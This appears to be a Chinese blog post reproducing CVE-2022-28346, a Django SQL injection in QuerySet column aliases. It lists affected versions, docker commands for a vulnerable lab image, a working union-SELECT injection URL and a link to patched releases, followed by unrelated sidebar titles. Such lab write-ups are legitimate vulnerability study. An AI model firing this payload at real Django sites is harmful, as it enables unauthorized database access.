当前位置:网站首页>CVE-2022-28346:Django SQL注入漏洞
CVE-2022-28346:Django SQL注入漏洞
2022-07-07 22:52:00 【yggcwhat】
0x01 简介
Django 是用 Python 开发的一个免费开源的 Web 框架,几乎囊括了 Web 应用的方方面面,可以用于快速搭建高性能、优雅的网站,Django 提供了许多网站后台开发经常用到的模块,使开发者能够专注于业务部分。
0x02 漏洞概述
漏洞编号:CVE-2022-28346
攻击者使用精心编制的字典, 通过**kwargs传递给QuerySet.annotate()、aggregate()和extra()这些方法,可导致这些方法在列别名中受到SQL注入攻击。
0x03 影响版本
4.0 <= Django < 4.0.4
3.2 <= Django < 3.2.13
2.2 <= Django < 2.2.28
0x04 环境搭建
docker pull s0cke3t/cve-2022-28346:latest
docker run -d -p 8080:8000 s0cke3t/cve-2022-28346
0x05 漏洞复现
通过报错页面可以发现存在哪些接口
访问接口如果存在传参,同样会提示报错信息
使用报错提示的参数进行sql注入
http://x.x.x.x:8000/demo?field=demo.name" FROM "demo_user" union SELECT "1",sqlite_version(),"3" --
0x06 修复方式
官方已发布安全版本,下载地址:
https://www.djangoproject.com/download/
边栏推荐
- 51与蓝牙模块通讯,51驱动蓝牙APP点灯
- 韦东山第二期课程内容概要
- Is 35 really a career crisis? No, my skills are accumulating, and the more I eat, the better
- Langchao Yunxi distributed database tracing (II) -- source code analysis
- Play sonar
- How to measure whether the product is "just needed, high frequency, pain points"
- NVIDIA Jetson测试安装yolox过程记录
- Qt添加资源文件,为QAction添加图标,建立信号槽函数并实现
- C language 001: download, install, create the first C project and execute the first C language program of CodeBlocks
- RPA cloud computer, let RPA out of the box with unlimited computing power?
猜你喜欢
腾讯安全发布《BOT管理白皮书》|解读BOT攻击,探索防护之道
第一讲:链表中环的入口结点
fabulous! How does idea open multiple projects in a single window?
The standby database has been delayed. Check that the MRP is wait_ for_ Log, apply after restarting MRP_ Log but wait again later_ for_ log
Kubernetes Static Pod (静态Pod)
DNS 系列(一):为什么更新了 DNS 记录不生效?
How to insert highlighted code blocks in WPS and word
Where is the big data open source project, one-stop fully automated full life cycle operation and maintenance steward Chengying (background)?
1293_ Implementation analysis of xtask resumeall() interface in FreeRTOS
STM32F1与STM32CubeIDE编程实例-旋转编码器驱动
随机推荐
Notice on organizing the second round of the Southwest Division (Sichuan) of the 2021-2022 National Youth electronic information intelligent innovation competition
从Starfish OS持续对SFO的通缩消耗,长远看SFO的价值
LeetCode刷题
Installation and configuration of sublime Text3
动态库基本原理和使用方法,-fPIC 选项的来龙去脉
备库一直有延迟,查看mrp为wait_for_log,重启mrp后为apply_log但过一会又wait_for_log
Qt不同类之间建立信号槽,并传递参数
Qt添加资源文件,为QAction添加图标,建立信号槽函数并实现
The method of server defense against DDoS, Hangzhou advanced anti DDoS IP section 103.219.39 x
What if the testing process is not perfect and the development is not active?
Emotional post station 010: things that contemporary college students should understand
SQL knowledge summary 004: Postgres terminal command summary
“一个优秀程序员可抵五个普通程序员”,差距就在这7个关键点
【obs】Impossible to find entrance point CreateDirect3D11DeviceFromDXGIDevice
韦东山第三期课程内容概要
爬虫实战(八):爬表情包
The standby database has been delayed. Check that the MRP is wait_ for_ Log, apply after restarting MRP_ Log but wait again later_ for_ log
Introduction to paddle - using lenet to realize image classification method I in MNIST
Leetcode brush questions
tourist的NTT模板